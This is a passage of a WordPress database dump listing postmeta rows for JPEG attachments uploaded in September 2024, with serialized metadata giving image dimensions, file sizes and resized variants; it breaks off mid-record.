(2982,1115,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1705;s:6:\"height\";i:960;s:4:\"file\";s:18:\"2024/09/3929_0.jpg\";s:8:\"filesize\";i:333142;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"3929_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17828;}s:5:\"large\";a:5:{s:4:\"file\";s:19:\"3929_0-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:166575;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"3929_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8450;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"3929_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:98718;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:19:\"3929_0-1536x865.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:865;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:332114;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:18:\"3929_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23451;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2983,1116,'_wp_attached_file','2024/09/3931_0.jpg'),
(2984,1116,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1705;s:6:\"height\";i:960;s:4:\"file\";s:18:\"2024/09/3931_0.jpg\";s:8:\"filesize\";i:215712;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"3931_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16201;}s:5:\"large\";a:5:{s:4:\"file\";s:19:\"3931_0-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:123502;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"3931_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7828;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"3931_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:77032;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:19:\"3931_0-1536x865.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:865;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:230398;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:18:\"3931_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20451;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2985,1117,'_wp_attached_file','2024/09/3934_0.jpg'),
(2986,1117,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1705;s:6:\"height\";i:960;s:4:\"file\";s:18:\"2024/09/3934_0.jpg\";s:8:\"filesize\";i:320214;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"3934_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18479;}s:5:\"large\";a:5:{s:4:\"file\";s:19:\"3934_0-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:164620;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"3934_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8928;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"3934_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:98690;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:19:\"3934_0-1536x865.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:865;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:322739;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:18:\"3934_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23828;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2987,1118,'_wp_attached_file','2024/09/3933_0.jpg'),
(2988,1118,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1705;s:6:\"height\";i:960;s:4:\"file\";s:18:\"2024/09/3933_0.jpg\";s:8:\"filesize\";i:270900;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"3933_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17382;}s:5:\"large\";a:5:{s:4:\"file\";s:19:\"3933_0-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:145891;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"3933_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8617;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"3933_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:88464;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:19:\"3933_0-1536x865.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:865;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:279531;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:18:\"3933_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21768;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2989,1119,'_wp_attached_file','2024/09/3932_0.jpg'),
(2990,1119,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1705;s:6:\"height\";i:960;s:4:\"file\";s:18:\"2024/09/3932_0.jpg\";s:8:\"filesize\";i:282399;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"3932_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17504;}s:5:\"large\";a:5:{s:4:\"file\";s:19:\"3932_0-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:146779;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"3932_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8011;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"3932_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:88368;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:19:\"3932_0-1536x865.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:865;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:286872;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:18:\"3932_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22059;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2991,1120,'_wp_attached_file','2024/09/3930_0.jpg'),
(2992,1120,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1705;s:6:\"height\";i:960;s:4:\"file\";s:18:\"2024/09/3930_0.jpg\";s:8:\"filesize\";i:235613;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"3930_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16507;}s:5:\"large\";a:5:{s:4:\"file\";s:19:\"3930_0-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:130567;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"3930_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7776;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"3930_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:80525;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:19:\"3930_0-1536x865.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:865;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:247866;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:18:\"3930_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20869;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2993,1121,'_wp_attached_file','2024/09/3935_0.jpg'),
(2994,1121,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1705;s:6:\"height\";i:960;s:4:\"file\";s:18:\"2024/09/3935_0.jpg\";s:8:\"filesize\";i:187977;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"3935_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15652;}s:5:\"large\";a:5:{s:4:\"file\";s:19:\"3935_0-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:110144;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"3935_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8020;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"3935_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:69812;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:19:\"3935_0-1536x865.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:865;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:203579;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:18:\"3935_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19573;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2995,1123,'_wp_attached_file','2024/09/3937_0.jpg'),
(2996,1122,'_wp_attached_file','2024/09/3936_0.jpg'),
(2997,1123,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1705;s:6:\"height\";i:960;s:4:\"file\";s:18:\"2024/09/3937_0.jpg\";s:8:\"filesize\";i:217854;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"3937_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16777;}s:5:\"large\";a:5:{s:4:\"file\";s:19:\"3937_0-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:123696;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"3937_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7756;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"3937_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:77774;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:19:\"3937_0-1536x865.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:865;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:229762;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:18:\"3937_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21343;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2998,1122,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1705;s:6:\"height\";i:960;s:4:\"file\";s:18:\"2024/09/3936_0.jpg\";s:8:\"filesize\";i:159987;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"3936_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15142;}s:5:\"large\";a:5:{s:4:\"file\";s:19:\"3936_0-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:99210;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"3936_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8206;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"3936_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:64096;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:19:\"3936_0-1536x865.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:865;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:178257;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:18:\"3936_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18854;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2999,1124,'_wp_attached_file','2024/09/S__69656585.jpg'),
(3000,1124,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1703;s:6:\"height\";i:961;s:4:\"file\";s:23:\"2024/09/S__69656585.jpg\";s:8:\"filesize\";i:717717;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"S__69656585-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18017;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"S__69656585-1024x578.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:578;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:177920;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"S__69656585-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8169;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"S__69656585-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:104782;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:24:\"S__69656585-1536x867.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:867;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:356995;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:23:\"S__69656585-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23541;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(3001,1125,'_wp_attached_file','2024/09/S__69656581.jpg'),
(3002,1125,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:23:\"2024/09/S__69656581.jpg\";s:8:\"filesize\";i:742079;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"S__69656581-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17940;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"S__69656581-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:182523;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"S__69656581-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8449;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"S__69656581-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:106302;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:24:\"S__69656581-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:368357;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:23:\"S__69656581-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23471;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(3003,1126,'_wp_attached_file','2024/09/S__69656589_0.jpg'),
(3004,1126,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1703;s:6:\"height\";i:961;s:4:\"file\";s:25:\"2024/09/S__69656589_0.jpg\";s:8:\"filesize\";i:470164;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__69656589_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18373;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__69656589_0-1024x578.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:578;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:138786;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69656589_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8736;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__69656589_0-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:87902;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__69656589_0-1536x867.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:867;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:256837;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69656589_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23356;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(3005,1127,'_wp_attached_file','2024/09/S__69656591_0.jpg'),
(3006,1127,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1703;s:6:\"height\";i:961;s:4:\"file\";s:25:\"2024/09/S__69656591_0.jpg\";s:8:\"filesize\";i:590587;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__69656591_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19758;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__69656591_0-1024x578.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:578;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:165245;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69656591_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9280;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__69656591_0-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:101662;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__69656591_0-1536x867.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:867;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:313371;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69656591_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25281;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(3007,1128,'_wp_attached_file','2024/09/S__69656596_0.jpg'),
(3008,1128,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2024/09/S__69656596_0.jpg\";s:8:\"filesize\";i:562490;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__69656596_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16424;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__69656596_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:146134;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69656596_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8032;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__69656596_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:87574;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__69656596_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"m